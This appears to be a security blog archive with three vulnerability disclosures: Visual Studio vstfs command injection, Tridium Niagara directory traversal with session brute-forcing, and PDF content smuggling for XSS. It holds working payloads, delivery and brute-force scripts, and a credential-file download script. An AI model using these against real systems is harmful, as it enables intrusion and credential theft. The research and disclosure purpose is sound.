Archive for the 'Security' Category

Thursday, February 12th, 2015

Visual Studio VSTFS protocol handler command injection

Last week, someone told me that my blog was on the “LovelyHorse” list. I’ve always thought that I was the only person who cared about this blog, but I guess there is a lonely analyst out there that also cares… lonely analyst, this one is for you :)

I reported an issue affecting Visual Studio 2012 (which I had installed on one of my dev machines at the time). The issue was a blast from the past and reminded me of simpler times when I had the privilege of doing vulnerability research with Nate McFeters and Rob Carter :). Microsoft has addressed the issue, but determined that it did not warrant a bulletin, so you'll have to download Visual Studio 2012 Update 4 if you want to "patch" this issue. I have not verified whether other versions of Visual Studio were/are affected. Tested on Win7 with IE10 and VS2012.

Visual Studio 2012 registers the “vstfs” protocol handler during the installation process. This protocol handler calls devenv.exe in the following manner:

"C:\Program Files (x86)\Microsoft Visual Studio 11.0\Common7\IDE\devenv.exe" /TfsLink "%1"
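If you want to see how the handler is wired up on your own machine, you can pull the registered command line straight out of the registry. Here's a minimal sketch (assuming the standard HKEY_CLASSES_ROOT\vstfs\shell\open\command location used by URL protocol handlers, run on a box with VS2012 installed):

import winreg

def read_handler_command(scheme):
    """Return the shell command registered for a URL protocol handler."""
    key_path = r"{}\shell\open\command".format(scheme)
    with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, key_path) as key:
        command, _ = winreg.QueryValueEx(key, "")  # the default value holds the command line
        return command

if __name__ == "__main__":
    # On a VS2012 box this should print something like:
    # "C:\...\devenv.exe" /TfsLink "%1"
    print(read_handler_command("vstfs"))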

As you know, protocol handlers can be instantiated remotely, most commonly via web pages. The "%1" value can be attacker controlled and contains the values supplied when the attacker calls the protocol handler:

<iframe src="vstfs:test"></iframe>

will result in the following being passed to the shell:

"C:\Program Files (x86)\Microsoft Visual Studio 11.0\Common7\IDE\devenv.exe" /TfsLink "vstfs:test"

Some time ago, I discovered that it was possible to escape out of the double quotes when passing argument values to protocol handlers via Internet Explorer (and other browsers on Windows, like Chrome). Sadly, this behavior is "by design" and will not be fixed anytime soon. Knowing this, we can inject additional command line switches which will be passed to devenv.exe. If we know of a suitable command line switch for devenv.exe, we can repurpose devenv.exe and the vstfs protocol handler to do our bidding. For example, if we pass the following to Internet Explorer (copy/paste into the address bar or serve it from a webpage):

vstfs:test" /command "Tools.Shell /c c:\windows\system32\calc.exe

We’ll end up with the following being passed to the remote system:

"C:\Program Files (x86)\Microsoft Visual Studio 11.0\Common7\IDE\devenv.exe" /TfsLink "vstfs:test" /command "Tools.Shell /c c:\windows\system32\calc.exe"

The line above launches devenv.exe and also shells an executable of our choice (with the ability to pass arbitrary command line arguments to that executable).
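For completeness, here's a rough sketch of how an attacker might deliver the injected vstfs: URL from a web page. This is purely illustrative: the port and handler class are my own choices, and the payload is the same string shown above.

import http.server

PAYLOAD = 'vstfs:test" /command "Tools.Shell /c c:\\windows\\system32\\calc.exe'

POC_PAGE = """<html><body>
<iframe src='{payload}'></iframe>
</body></html>""".format(payload=PAYLOAD)

class PocHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(POC_PAGE.encode())

if __name__ == "__main__":
    # Browse to http://localhost:8000/ from a VS2012 box and expect the
    # prompts described next.
    http.server.HTTPServer(("", 8000), PocHandler).serve_forever()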

Fortunately, modern browsers (with the exception of Safari… but who uses Safari on Windows?!?!) display warnings when launching protocol handlers. This means users will likely encounter two prompts from IE (a protocol handler warning and an elevation warning); you can witness this if you copy/paste the vstfs:test" /command "Tools.Shell /c c:\windows\system32\calc.exe" string into the IE address bar (tested against IE10 on a system that has VS2012).

There might be a way to bounce this protocol handler off a whitelisted protocol handler (one that doesn't cause a protocol handler warning) running at medium integrity. Alternatively, we could pass this protocol handler to a remote user via an application that doesn't have protocol handler warnings (like a chat application that supports URLs). If we can find such a case, there will be no warnings to the user and we'll have a zero-click or one-click remote command injection exploit against Visual Studio users.

Posted by xssniper | Filed in Security

 

Monday, November 26th, 2012

Tridium Niagara – Directory Traversal

In July of this year, I wrote about some of the frustrations I encountered when working with Tridium and trying to get them to fix various issues with their Niagara framework. The Niagara framework is the most prevalent Industrial Control System (ICS) in the world; it links together various ICS technologies and protocols. Looking at Eireann Leverett's research on Internet accessible ICS, we see that Tridium Niagara is the most prevalent ICS system exposed to the Internet. I didn't talk much about the details of the issues I reported to DHS, but considering the patch has been out for nearly six months, I figure now is a good time.


The initial issue I reported to Tridium was a directory traversal issue that allowed remote, authenticated users to access files outside of the webroot. "Authenticated" includes demo and low-privileged accounts. The directory traversal is very simple. Most web application security specialists know the classic "../../" style directory traversal; however, Tridium is a bit different. Tridium makes use of "ordinals" to enable various functionality within Niagara. For example, here is a URL for a Niagara deployment that uses the "station" ordinal:


http://axdemo.tridium.com/ord?station:%7Cslot:/Drivers/DemoNetwork




The Niagara framework supports a large number of ordinals. One of these ordinals is the "file" ordinal, which is used to retrieve files from the Niagara framework server. The "file" ordinal is followed by the path and filename of a file located within the webroot of the Niagara framework server. The Tridium Niagara framework isn't susceptible to "../../" style traversal attacks; instead, the Niagara framework uses the "^" character to traverse directories. Knowing this, we can specify a "^" character immediately following the file ordinal to traverse outside of the webroot. There are several files just outside of the webroot, but one file is particularly interesting: a file named "config.bog". The config.bog file is the configuration file for the entire Tridium Niagara deployment. It contains all the configuration settings, including usernames and encrapted (yes, I said encrapted… not encrypted) passwords for all accounts enabled on the system. Knowing this, we have a simple, reliable form of privilege escalation for any Tridium Niagara device. The exploit is very simple:

http://Niagara-installation/ord?file:^config.bog



When you make the request above, you'll download a compressed file. Unzip the compressed file and you'll find the clear text config.bog for the Niagara server. Inside the config.bog, you'll see the entire, detailed configuration for the Tridium device along with the usernames and passwords (protected with encraption). That's it, it's that simple. When I reported this issue to Tridium, I sent them a copy of their config.bog file for their marketing demo deployment.
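If you want to script the request above, a rough sketch looks something like this (the host name and the demo credentials are placeholders, and whether a given deployment wants HTTP Basic auth or a form-based login is an assumption on my part):

import requests

TARGET = "http://niagara-installation"   # placeholder host
AUTH = ("demo", "demo")                  # hypothetical low-privilege/demo account

# Note: some HTTP clients percent-encode the "^"; adjust if the server doesn't
# decode it for you.
resp = requests.get(TARGET + "/ord?file:^config.bog", auth=AUTH, timeout=30)
resp.raise_for_status()

# Save the compressed response to disk; unzip it to get the clear text config.bog.
with open("config.bog.download", "wb") as f:
    f.write(resp.content)
print("saved %d bytes" % len(resp.content))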


Let's ignore the fact that demo, default, and guest accounts are fairly common on these devices. In addition to the directory traversal, I also reported a weak session ID issue and an insecure credential storage issue. The Tridium Niagara framework generates session IDs that have about 9 bits of strength. This makes brute force attacks completely feasible and allows a remote attacker to quickly gain access to an authenticated state. Once authenticated, they are free to utilize the directory traversal to escalate privilege to Administrator. If that weren't enough, the Tridium Niagara framework also stores a copy of the current username and password (base64'd) in the cookie, giving any XSS bug the potential to divulge the clear text username and password.
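To put the 9 bits in perspective: that's only 2^9 = 512 possible values. A back-of-the-envelope sketch of the brute force looks something like this (the cookie name and the idea that session IDs are small integers are hypothetical, purely to illustrate how small the search space is):

import requests

TARGET = "http://niagara-installation"          # placeholder host
PROTECTED = TARGET + "/ord?station:%7Cslot:/"   # any page that requires auth

for candidate in range(2 ** 9):                 # 512 guesses total
    cookies = {"niagara_session": str(candidate)}   # hypothetical cookie name/format
    r = requests.get(PROTECTED, cookies=cookies, timeout=10)
    if r.status_code == 200 and "login" not in r.text.lower():
        print("live session id:", candidate)
        break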


There is a shining light to this story. When I first reported these issues to Tridium, the initial response was horrid. Six months after the initial report, Tridium's leadership attempted to pass these vulnerabilities off as "by design". Eventually, the folks at Honeywell (Tridium's parent company) found out about these issues and took over the response process. Three weeks later, they had a patch ready to go. Honeywell made the patch available to me a few days in advance of the release so I could take a look and verify the issues were fixed. They even gave me credentials to the new demo site so I could see the new features and security changes. It was welcome to see an ICS vendor take such a stance towards security researchers; I hope other ICS vendors take note and follow suit. I'd like to personally thank Kevin Staggs for driving the renewed focus on security for Tridium Niagara; if you're a Tridium customer, you should thank Kevin too. You can learn more about the patch here:

https://www.tridium.com/cs/tridium_news/security_patch_36

BK

Posted by xssniper | Filed in ICS, Security

 

Thursday, October 11th, 2012

Content Smuggling

A few years ago, I discovered a peculiar design decision described in the PDF specification. This design flaw allows an attacker to conduct XSS attacks against some websites that would not normally have XSS vulnerabilities. I reported this issue to Adobe in late 2009. Apparently, there are some challenging back-compat issues which make changing this design difficult. Given it's been nearly three years since I first reported the issue to Adobe and a fix from Adobe doesn't seem likely (Chrome has already fixed their internal PDF reader), I figured I should let the web application security community know about the exposure. I don't expect "APT" or other 31337 $country "cyber liberation armies" to use this anytime soon, but it is interesting behavior and I hope web application security folks find it useful. Hopefully some researcher who's smarter than me can take this to the next level. Oh, and I apologize for the ugly PoCs in advance!

If we take a look at the implementation note for Section 3.4.1, "File Header", in Appendix H of the PDF specification, we see the following:

13. Acrobat viewers require only that the header appear somewhere within
the first 1024 bytes of the file.

Anyone who has read the PDF specification probably knows about this behavior; in fact, Julia Wolf mentioned it in her epic OMG WTF PDF talk at CCC in 2010. This peculiar design allows for the creation of a hybrid file that is both some arbitrary file type (such as GIF, PNG, DOC, etc.) and a PDF. We do this by cramming a PDF header after another file header. An example of this is shown in the screenshot below:

[Screenshot: hex view of a hybrid GIF/PDF file]
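Building such a hybrid is mostly just byte concatenation. Here's a minimal sketch that prepends a tiny GIF to an existing PDF so the %PDF header still lands inside the first 1024 bytes (file names are placeholders, and this relies on the PDF viewer being lenient about the shifted byte offsets; the actual PoC files may be constructed more carefully than a blind concatenation):

TINY_GIF = bytes.fromhex(
    "47494638396101000100800000000000ffffff21f9040100000000"
    "2c00000000010001000002024401003b"
)  # a valid 43-byte 1x1 GIF

with open("input.pdf", "rb") as f:        # placeholder: any small PDF
    pdf_bytes = f.read()

hybrid = TINY_GIF + pdf_bytes
offset = hybrid.find(b"%PDF-")
assert 0 <= offset < 1024, "PDF header must sit inside the first 1024 bytes"

with open("NotAPDF.gif", "wb") as f:      # name borrowed from the PoC below
    f.write(hybrid)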

Hopefully, by now we've already realized that hosting user-controlled PDFs and serving those PDFs from a sensitive domain is dangerous from a web security perspective. However, with this quirky file header behavior, we have the ability to smuggle PDFs onto a website that only accepts "benign" file types. As an example, I've uploaded such a file to an appspot web application I created. The PoC shows that we can load a single file as both a GIF (or any other file type we want) and a PDF. Adobe PDF Reader needs to be set as your default PDF handler for the PoC to work.

http://pdfxss.appspot.com/Son-of-Gifar/Content-Smuggling.html

The only difference between the two displays in the PoC above is the way we reference the file. In the case of the image, we simply use an IMG tag. When we want to force the browser to hand the file to the default PDF reader, we make use of the OBJECT tag and explicitly specify a content type. Of course, this technique can be generalized for other plugins.

<img src="http://pdfxss.appspot.com/Son-of-Gifar/NotAPDF.gif" height=10 width=10></img>

vs

<object data="http://pdfxss.appspot.com/Son-of-Gifar/NotAPDF.gif" type="application/pdf" width="500" height="500"></object>

PDFs do not have by-design access to the DOM of the domain from which they are served. How then can we use a PDF to achieve XSS? Here is where the feature-rich Adobe PDF Reader comes into play. Once the PDF is loaded, we have a couple of different options to achieve XSS. First, we can redirect the PDF to a javascript URL. These redirections navigate the browser (not the PDF document) and result in true browser-based XSS on the victim domain. Luckily, Adobe considers redirection from a PDF to javascript URLs a bug and has eliminated the most obvious methods for achieving this. There is, however, another method which essentially achieves the same impact. We can use a built-in API to make network requests to and from the victim domain. These network requests will carry any cookies associated with the victim domain, giving the attacker access to authenticated resources.

The following link demonstrates how this issue could be used against a website. The domain xs-sniper.com (the attacker's domain in this example) loads a smuggled GIF/PDF from http://pdfxss.appspot.com (the victim domain in this example). Once the PDF is loaded, we make use of the built-in XML APIs to retrieve the file /secret.txt from http://pdfxss.appspot.com (the victim domain).

http://xs-sniper.com/sniperscope/Adobe/Son-of-Gifar/PDFXML.html

IE users will see a warning in the PDF reader. This is because IE actually downloads the PDF and opens a local copy :) You can verify the IE behavior by browsing to this PoC with Internet Explorer (Adobe PDF Reader must be set as the default reader).

http://pdfxss.appspot.com/Son-of-Gifar/Location.html

Lastly, you can inject a PDF into a website if you already have an XSS. This might be helpful in bypassing XSS filters or application filtering. This is accomplished by injecting a PDF into the vulnerable site using the OBJECT tag.

<object data="http://vulnerable-domain/xss.asp?vulnerable-param=<injected PDF HERE>" type="application/pdf" width="500" height="500"></object>

An example of how this could be done is given below (this PoC is best viewed in Firefox with Adobe PDF Reader, but the technique is possible in all browsers).

http://xs-sniper.com/sniperscope/Adobe/Son-of-Gifar/PDF-Injection.html

What's the impact? Well, I suspect there are plenty of Internet-facing websites that are vulnerable to this bug. Any web application that accepts uploads of "benign" file types and then serves those files back to the user could be affected. This also affects websites which rely on Content-Type headers to prevent XSS (btw, this strategy doesn't work). See Phil Purviance's blog for tips on spotting (and exploiting) websites that use Content-Type to protect against XSS. This bug can also be used to exploit applications that use Content-Disposition headers to prevent XSS bugs. The most common attack surface here will likely be internal content portals. Pretty much every internal content portal used in the enterprise is vulnerable to this issue (think SharePoint).

You can test for this issue by trying to upload this file to a vulnerable web application. If you see the PDF header in the uploaded file AND the file is served from a sensitive domain (e.g., it has auth cookies), then the application is vulnerable.
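If you'd rather script the check, here's a quick sketch (the upload URL is a placeholder for wherever your file ended up):

import requests

uploaded_url = "https://sensitive-domain.example/uploads/NotAPDF.gif"  # placeholder

resp = requests.get(uploaded_url, timeout=30)
offset = resp.content.find(b"%PDF-")

if 0 <= offset < 1024:
    print("PDF header survived at offset %d -- content smuggling likely possible" % offset)
    print("served Content-Type:", resp.headers.get("Content-Type"))
else:
    print("no PDF header in the first 1024 bytes; the upload was probably re-encoded")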

The proper defense for this is the use of alternate domains for user-supplied content (aka sandboxed domains). Sandboxed domains can be tricky to implement. Some of the most popular web applications on the web already make extensive use of sandboxed domains, but the vast majority of web applications do not. Once again, internal content portals are in a hard spot, as it's more difficult to implement a sandboxed domain on an internal network. Sandboxed domains are a subject many "web application security specialists" understand poorly, and they probably deserve their own blog post. How to properly implement a sandboxed domain is a great interview question for senior web application security roles because it tests design and implementation skills. It also requires a really solid understanding of browser/plugin same origin policy. I haven't seen much written about sandboxed domains, but this blog post does a nice job of summing up some of the challenges of content hosting: http://googleonlinesecurity.blogspot.com/2012/08/content-hosting-for-modern-web.html
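For illustration only, here's a tiny sketch of the sandboxed-domain idea: user uploads are served from a throwaway origin that carries none of the application's cookies, with headers that discourage in-browser rendering. This is a toy, not a complete content hosting design.

import http.server

class SandboxedContentHandler(http.server.SimpleHTTPRequestHandler):
    def end_headers(self):
        # Force a download instead of in-place rendering by plugins/viewers.
        self.send_header("Content-Disposition", "attachment")
        # Stop MIME sniffing from "upgrading" the content type.
        self.send_header("X-Content-Type-Options", "nosniff")
        super().end_headers()

if __name__ == "__main__":
    # Run this on the sandbox origin only; the main application's cookies are
    # never scoped to this host, so a smuggled PDF has nothing useful to steal.
    http.server.HTTPServer(("", 8080), SandboxedContentHandler).serve_forever()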

Happy hunting!

BK

Posted by xssniper | Filed in Security, Web Application Security